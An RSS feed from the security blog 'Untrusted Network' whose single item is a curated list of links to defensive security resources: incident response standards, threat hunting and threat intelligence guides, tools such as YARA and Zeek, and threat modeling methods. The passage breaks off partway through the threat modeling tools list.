<?xml version="1.0" encoding="utf-8" standalone="yes" ?>
<rss version="2.0" 
  xmlns:content="http://purl.org/rss/1.0/modules/content/" 
  xmlns:dc="http://purl.org/dc/elements/1.1/" 
  xmlns:atom="http://www.w3.org/2005/Atom" 
  xmlns:sy="http://purl.org/rss/1.0/modules/syndication/" 
  xmlns:media="http://search.yahoo.com/mrss/">
  <channel>
    <title>Untrusted Network</title>
    <link>https://untrustednetwork.net/en/</link>
    <description>Recent content on Untrusted Network</description>
    <generator>Hugo -- gohugo.io</generator>
    <language>en</language>
    <copyright>&amp;copy; Jan Kopriva 2015 - {year}</copyright>
    <lastBuildDate>Mon, 06 Apr 2026 10:50:00 +0100</lastBuildDate>
    <sy:updatePeriod>weekly</sy:updatePeriod>
    <sy:updateFrequency>weekly</sy:updateFrequency>
    
        <atom:link href="https://untrustednetwork.net/en/index.xml" rel="self" type="application/rss+xml" />
    
    
    
      
      
      
        
      
        
      
        
      
        
      
        
      
        
      
        
      
        
      
        
      

      
      <item>
        <title>Resources and Tools</title>
        <link>https://untrustednetwork.net/en/csirt/</link>
        <pubDate>Tue, 01 Jan 2019 11:28:23 +0100</pubDate>
        
        <atom:modified>Tue, 10 Feb 2026 16:00:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/csirt/</guid>
        <description>This page contains links to couple of interesting training resources, tools and other material useful for Incident Response, Penetration Testing, Malware Analysis and other security-related areas.
Although I&amp;rsquo;ve placed it here mainly for myself and students of my security courses, if you find it useful, it is also accessible through the easily remembered URL csirt.xyz.
Bellow, you may find materials for the following areas:
 Security Monitoring and Incident Response Threat Hunting Threat Intelligence Threat Modeling Penetration Testing and Red Teaming Purple Teaming Malware Analysis Application Security OT Security Miscellaneous  Security Monitoring and Incident Response  Standards and Best Practices  ENISA Good Practice Guide for Incident Management  NIST Computer Security Incident Handling Guide (SP 800-61r2) SIM3: Security Incident Management Maturity Model SOC-CMM Reference Security Incident Classification Taxonomy (current version) FIRST CSIRT/PSIRT Services Framework MaGMa Use Case Framework Traffic Light Protocol (TLP) Incident Response Hierarchy of Needs INTERPOL Guidelines for Digital Forensics First Responders NIST Guide to Integrating Forensic Techniques into Incident Response (NIST SP 800-86) CISA Cybersecurity Incident &amp;amp; Vulnerability Response Playbooks ENISA CSIRT Maturity Framework Google SOAR Maturity Model RFC 2350 - Expectations for Computer Security Incident Response Best practices for event logging and threat detection     Training Resources  Tutorials for Network Miner and Other Netresec Tools PCAP Files for Training - Malware Traffic Analysis FIRST Courses TRANSITS Materials Encyclopedia of evasion techniques STOic TTX Framework STOic TTX Facilitator Training Materials STOic TTX Facilitator Training Videos CISA Tabletop Exercise Packages (CTEP) ENISA Cybersecurity Exercise Methodology Blue Team CTF Challenges     Collections of Resources  Awesome Incident Response Awesome Security APIs Awesome Detection Engineering Awesome SOAR List Tool Analysis Result Sheet TriOp - Tool for quickly gathering statistical information from Shodan.</description>
        <content:encoded>&lt;p&gt;This page contains links to couple of interesting training resources, tools and other material useful for Incident Response, Penetration Testing, Malware Analysis and other security-related areas.&lt;/p&gt;
&lt;p&gt;Although I&amp;rsquo;ve placed it here mainly for myself and students of my security courses, if you find it useful, it is also accessible through the easily remembered URL &lt;a href=&#34;http://csirt.xyz/&#34;&gt;csirt.xyz&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Bellow, you may find materials for the following areas:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;#monitoring_ir&#34;&gt;Security Monitoring and Incident Response&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#threat_hunting&#34;&gt;Threat Hunting&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#threat_intelligence&#34;&gt;Threat Intelligence&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#threat_modeling&#34;&gt;Threat Modeling&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#penetration_testing&#34;&gt;Penetration Testing and Red Teaming&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#purple_teaming&#34;&gt;Purple Teaming&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#malware_analysis&#34;&gt;Malware Analysis&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#application_security&#34;&gt;Application Security&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#ot_security&#34;&gt;OT Security&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#misc&#34;&gt;Miscellaneous&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&#34;monitoring_ir&#34;&gt;Security Monitoring and Incident Response&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Standards and Best Practices
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;https://www.enisa.europa.eu/publications/good-practice-guide-for-incident-management&#34;&gt;ENISA Good Practice Guide for Incident Management &lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://untrustednetwork.net/files/NIST.SP.800-61r2.pdf&#34;&gt;NIST Computer Security Incident Handling Guide (SP 800-61r2)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;http://opencsirt.org/wp-content/uploads/2019/12/SIM3-mkXVIIIc.pdf&#34;&gt;SIM3: Security Incident Management Maturity Model&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://soc-cmm.com/products/&#34;&gt;SOC-CMM&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.enisa.europa.eu/publications/reference-incident-classification-taxonomy&#34;&gt;Reference Security Incident Classification Taxonomy&lt;/a&gt; (&lt;a href=&#34;https://github.com/enisaeu/Reference-Security-Incident-Taxonomy-Task-Force/blob/master/working_copy/humanv1.md&#34;&gt;current version&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.first.org/education/service-framework&#34;&gt;FIRST CSIRT/PSIRT Services Framework&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.betaalvereniging.nl/wp-content/uploads/FI-ISAC-Use-Case-Framework-Full-Documentation.pdf&#34;&gt;MaGMa Use Case Framework&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.first.org/tlp/&#34;&gt;Traffic Light Protocol (TLP)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://github.com/swannman/ircapabilities&#34;&gt;Incident Response Hierarchy of Needs&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.interpol.int/content/download/16243/file/Guidelines%20to%20Digital%20Forensics%20First%20Responders_V7.pdf?inLanguage=eng-GB&#34;&gt;INTERPOL Guidelines for Digital Forensics First Responders&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-86.pdf&#34;&gt;NIST Guide to Integrating Forensic Techniques into Incident Response (NIST SP 800-86)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://cisa.gov/sites/default/files/publications/Federal_Government_Cybersecurity_Incident_and_Vulnerability_Response_Playbooks_508C.pdf&#34;&gt;CISA Cybersecurity Incident &amp;amp; Vulnerability Response Playbooks&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.enisa.europa.eu/publications/enisa-csirt-maturity-framework&#34;&gt;ENISA CSIRT Maturity Framework&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://go.chronicle.security/hubfs/SOAR_Maturity_Model.pdf&#34;&gt;Google SOAR Maturity Model&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://datatracker.ietf.org/doc/html/rfc2350&#34;&gt;RFC 2350 - Expectations for Computer Security Incident Response&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.cyber.gov.au/sites/default/files/2024-08/best-practices-for-event-logging-and-threat-detection.pdf&#34;&gt;Best practices for event logging and threat detection&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;ul&gt;
&lt;li&gt;Training Resources
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;https://www.netresec.com/?page=Resources&#34;&gt;Tutorials for Network Miner and Other Netresec Tools&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.malware-traffic-analysis.net/&#34;&gt;PCAP Files for Training - Malware Traffic Analysis&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.first.org/education/trainings&#34;&gt;FIRST Courses&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://tf-csirt.org/transits/materials/&#34;&gt;TRANSITS Materials&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://evasions.checkpoint.com/&#34;&gt;Encyclopedia of evasion techniques&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://untrustednetwork.net/files/stoic_ttx-framework.pdf&#34;&gt;STOic TTX Framework&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://untrustednetwork.net/files/stoic_ttx-training.pdf&#34;&gt;STOic TTX Facilitator Training Materials&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.cyberscotland.com/stoic-ttx-facilitator-training-series/&#34;&gt;STOic TTX Facilitator Training Videos&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.cisa.gov/resources-tools/services/cisa-tabletop-exercise-packages&#34;&gt;CISA Tabletop Exercise Packages (CTEP)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.enisa.europa.eu/publications/the-enisa-cybersecurity-exercise-methodology&#34;&gt;ENISA Cybersecurity Exercise Methodology&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://cyberdefenders.org/blueteam-ctf-challenges/&#34;&gt;Blue Team CTF Challenges&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;ul&gt;
&lt;li&gt;Collections of Resources
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;https://github.com/meirwah/awesome-incident-response&#34;&gt;Awesome Incident Response&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://github.com/deralexxx/security-apis&#34;&gt;Awesome Security APIs&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://github.com/infosecB/awesome-detection-engineering&#34;&gt;Awesome Detection Engineering&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://github.com/correlatedsecurity/Awesome-SOAR&#34;&gt;Awesome SOAR List&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://jpcertcc.github.io/ToolAnalysisResultSheet/&#34;&gt;Tool Analysis Result Sheet&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://untrustednetwork.net/en/triop/&#34;&gt;TriOp - Tool for quickly gathering statistical information from Shodan.io&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;ul&gt;
&lt;li&gt;Tools
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;https://gchq.github.io/CyberChef/&#34;&gt;CyberChef&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.sans.org/tools/sift-workstation&#34;&gt;SIFT - SANS Forensic VM&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://github.com/Neo23x0/sigma&#34;&gt;Sigma - Generic Signature Format for SIEM Systems&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://uncoder.io/&#34;&gt;Uncoder.IO: Universal Sigma Rule Converter&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://sigconverter.io/&#34;&gt;sigconverter.io&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.kroll.com/en/services/cyber-risk/incident-response-litigation-support/kroll-artifact-parser-extractor-kape&#34;&gt;KAPE - Kroll Artifact Parser and Extractor&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://github.com/davehull/Kansa&#34;&gt;Kansa&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://github.com/mitre-attack/attack-navigator&#34;&gt;MITRE ATT&amp;amp;CK Navigator&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://github.com/rabobank-cdc/DeTTECT&#34;&gt;DeTT&amp;amp;CT - Detect Tactics, Techniques &amp;amp; Combat Threats&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://virustotal.github.io/yara/&#34;&gt;YARA&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.netresec.com/?page=Networkminer&#34;&gt;Network Miner&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.netresec.com/?page=PolarProxy&#34;&gt;PolarProxy&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://osquery.io/&#34;&gt;osquery&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://docs.velociraptor.app/&#34;&gt;Velociraptor&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://wazuh.com/&#34;&gt;Wazuh&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://arkime.com/&#34;&gt;Arkime&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://zeek.org/&#34;&gt;Zeek&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://github.com/idaholab/Malcolm&#34;&gt;Malcolm&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://suricata.io/&#34;&gt;Suricata&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://github.com/Security-Onion-Solutions/securityonion/&#34;&gt;Security Onion&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://github.com/salesforce/jarm&#34;&gt;JARM&lt;/a&gt;/&lt;a href=&#34;https://github.com/salesforce/ja3&#34;&gt;JA3/JA3S&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://github.com/FoxIO-LLC/ja4&#34;&gt;JA4+ Network Fingerprinting&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://github.com/markbaggett/freq&#34;&gt;freq&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://github.com/fox-it/dissect&#34;&gt;Dissect&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://what2log.com/&#34;&gt;What2Log&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://github.com/cisagov/LME&#34;&gt;Logging Made Easy (LME)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://github.com/sans-blue-team/DeepBlueCLI&#34;&gt;DeepBlueCLI&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://github.com/Lookyloo/lookyloo&#34;&gt;Lookyloo&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://dfir-iris.org/&#34;&gt;IRIS - Open-Source Collaborative Incident Response Platform&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://timesketch.org/&#34;&gt;Timesketch&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;ul&gt;
&lt;li&gt;Misc
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;https://script-ed.org/wp-content/uploads/2016/12/13-3-cormack.pdf?d=10012020&#34;&gt;Incident Response: Protecting Individual Rights Under the General Data Protection Regulation&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://script-ed.org/wp-content/uploads/2020/08/cormack.pdf?d=10012020&#34;&gt;Processing Data to Protect Data: Resolving the Breach Detection Paradox&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://script-ed.org/article/nisd2-a-common-framework-for-information-sharing-among-network-defenders/&#34;&gt;NISD2: A Common Framework for Information Sharing Among Network Defenders&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://github.com/mattnotmax/cyberchef-recipes&#34;&gt;CyberChef Recipes&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://atc-project.github.io/atc-react/&#34;&gt;RE&amp;amp;CT Framework&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.first.org/resources/papers/conf2019/Public__SOC-Metrics-for-FIRST-v07-002-.pdf&#34;&gt;Practical SOC Metrics&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.soc-cmm.com/products/metrics/&#34;&gt;SOC-CMM Metrics Suite&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.first.org/global/sigs/metrics/metrics_csirt_services_framework&#34;&gt;Metrics for the Computer Security Incident Response Team (CSIRT) Services Framework&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.mitre.org/publications/technical-papers/11-strategies-world-class-cybersecurity-operations-center&#34;&gt;11 Strategies of a World-Class Cybersecurity Operations Center&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://gitlab.com/syntax-ir/playbooks&#34;&gt;Incident Response Public Playbooks and Structure&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.crest-approved.org/buying-building-cyber-services/cyber-security-incident-response-maturity-assessment/&#34;&gt;CREST Cyber Security Incident Response Maturity Assessment&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.vanimpe.eu/2020/12/28/how-to-support-defenders-with-the-permissible-actions-protocol/&#34;&gt;Permissible Actions Protocol (PAP)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://learn.microsoft.com/en-us/windows/security/threat-protection/use-windows-event-forwarding-to-assist-in-intrusion-detection#bkmk-appendixa&#34;&gt;Minimum recommended audit policy for Windows&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.cyber.gov.au/resources-business-and-government/essential-cyber-security/strategies-mitigate-cyber-security-incidents&#34;&gt;ASD Strategies to Mitigate Cyber Security Incidents&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://github.com/tsale/EDR-Telemetry&#34;&gt;EDR Telemetry&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://odef.wiki/&#34;&gt;Open Detection Engineering Framework (ODEF)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://ipurple.team/2024/02/21/detection-rules-development-framework/&#34;&gt;Detection Rules Development Framework&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.sans.org/posters/guide-to-security-operations/&#34;&gt;SANS Guide to Security Operations&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;h2 id=&#34;threat_hunting&#34;&gt;Threat Hunting&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Methodologies and Best Practices
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;https://www.threathunting.net/files/hunt-evil-practical-guide-threat-hunting.pdf&#34;&gt;Hunt Evil: Your Practical Guide to Threat Hunting&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://medium.com/@sqrrldata/the-cyber-hunting-maturity-model-6d506faa8ad5&#34;&gt;Sqrrl Cyber Hunting Maturity Model&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://cyberedgegroup.com/wp-content/uploads/2021/02/Endgames-Guide-to-Threat-Hunting.pdf&#34;&gt;The Endgame Guide to Threat Hunting&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.betaalvereniging.nl/wp-content/uploads/DEF-TaHiTI-Threat-Hunting-Methodology.pdf&#34;&gt;TaHiTI Threat Hunting Methodology&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://mitre.org/publications/technical-papers/ttp-based-hunting&#34;&gt;TTP-Based hunting&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.splunk.com/en_us/blog/security/peak-threat-hunting-framework.html&#34;&gt;PEAK Threat Hunting Framework&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.splunk.com/en_us/pdfs/gated/ebooks/threat-hunters-cookbook.pdf&#34;&gt;The Threat Hunter&amp;rsquo;s Cookbook&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;ul&gt;
&lt;li&gt;Collections of Resources
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;https://threathunterplaybook.com/&#34;&gt;Threat Hunter Project&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.threathunting.net/&#34;&gt;The ThreatHunting Project&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://securitydatasets.com/&#34;&gt;Security Datasets Project (Mordor)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://github.com/mthcht/awesome-lists&#34;&gt;Security lists for SOC/DFIR detections&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;ul&gt;
&lt;li&gt;Training Resources
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;https://www.activecountermeasures.com/hunt-training/&#34;&gt;Active Countermeasures Threat Hunt Training Course&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;ul&gt;
&lt;li&gt;Misc
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;https://www.sans.org/reading-room/whitepapers/threats/generating-hypotheses-successful-threat-hunting-37172&#34;&gt;Generating Hypotheses for Successful Threat Hunting&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;h2 id=&#34;threat_intelligence&#34;&gt;Threat Intelligence&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Methodologies and Best Practices
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;https://www.enisa.europa.eu/publications/enisa-cybersecurity-threat-landscape-methodology&#34;&gt;ENISA Threat Landscape Methodology&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://csrc.nist.gov/publications/detail/sp/800-150/final&#34;&gt;NIST Guide to Cyber Threat Information Sharing (SP 800-150)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.dni.gov/files/documents/ICD/ICD-203.pdf&#34;&gt;Intelligence Community Directive 203: Analytic Standards&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.x-isac.org/publication.html&#34;&gt;X-ISAC Guidelines to setting up an information sharing community&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;ul&gt;
&lt;li&gt;Training Resources
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;https://www.first.org/global/sigs/cti/curriculum/&#34;&gt;FIRST Cyber Threat Intelligence Curriculum&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://medium.com/katies-five-cents/a-cyber-threat-intelligence-self-study-plan-part-1-968b5a8daf9a&#34;&gt;A Cyber Threat Intelligence Self-Study Plan: Part 1&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://medium.com/katies-five-cents/a-cyber-threat-intelligence-self-study-plan-part-2-d04b7a529d36&#34;&gt;A Cyber Threat Intelligence Self-Study Plan: Part 2&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;ul&gt;
&lt;li&gt;Misc
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;https://apt.threattracking.com/&#34;&gt;APT Groups and Operations&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.sans.org/reading-room/whitepapers/threatintelligence/quantifying-threat-actor-assessments-39585&#34;&gt;Quantifying Threat Actor Assessments&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.ialeia.org/docs/Psychology_of_Intelligence_Analysis.pdf&#34;&gt;Psychology of Intelligence Analysis&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.crest-approved.org/cyber-threat-intelligence-maturity-assessment-tools/&#34;&gt;CREST Cyber Threat Intelligence Maturity Assessment Tools&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.ransomware.live/&#34;&gt;Recent ransomware victims&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.ransomlook.io/recent&#34;&gt;Recent ransomware attacks&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;h2 id=&#34;threat_modeling&#34;&gt;Threat Modeling&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Methodologies and Best Practices
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;https://www.schneier.com/academic/archives/1999/12/attack_trees.html&#34;&gt;Attack Trees&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://en.wikipedia.org/wiki/DREAD_(risk_assessment_model)&#34;&gt;DREAD&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.linddun.org/&#34;&gt;LINDDUN&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://resources.sei.cmu.edu/library/asset-view.cfm?assetID=309051&#34;&gt;OCTAVE &amp;amp; OCTAVE-Related Assets&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://versprite.com/blog/what-is-pasta-threat-modeling/&#34;&gt;PASTA&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.microsoft.com/security/blog/2007/09/11/stride-chart/&#34;&gt;STRIDE&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://en.wikipedia.org/wiki/CARVER_matrix&#34;&gt;CARVER&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://trike.sourceforge.net/&#34;&gt;Trike&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://threatmodeler.com/threat-modeling-methodologies-vast/&#34;&gt;VAST&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://emb3d.mitre.org/&#34;&gt;MITRE EMB3D Threat Model&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://csrc.nist.gov/csrc/media/publications/sp/800-154/draft/documents/sp800_154_draft.pdf&#34;&gt;NIST Guide to Data-Centric System Threat Modeling (SP 800-154)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://untrustednetwork.net/files/2022/TF-CSIRT-09-2022-Threat_modeling.pdf&#34;&gt;Threat modeling in Security Operations using MITRE ATT&amp;amp;CK&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://web.archive.org/web/20220119191327/https://www.mitre.org/publications/systems-engineering-guide/enterprise-engineering/systems-engineering-for-mission-assurance/crown-jewels-analysis&#34;&gt;Crown Jewels Analysis&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;ul&gt;
&lt;li&gt;Tools
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;https://docs.microsoft.com/en-us/azure/security/develop/threat-modeling-tool&#34;&gt;Microsoft Threat Modeling Tool&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://owasp.org/www-project-threat-dragon/&#34;&gt;OWASP Threat Dragon&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://cairis.org/&#34;&gt;Computer Aided Integration of Requirements and Information Security (CAIRIS)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://online.visual-paradigm.com/diagrams/features/threat-modeling-tool/&#34;&gt;Visual Paradigm Online Threat Modeling Toool&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
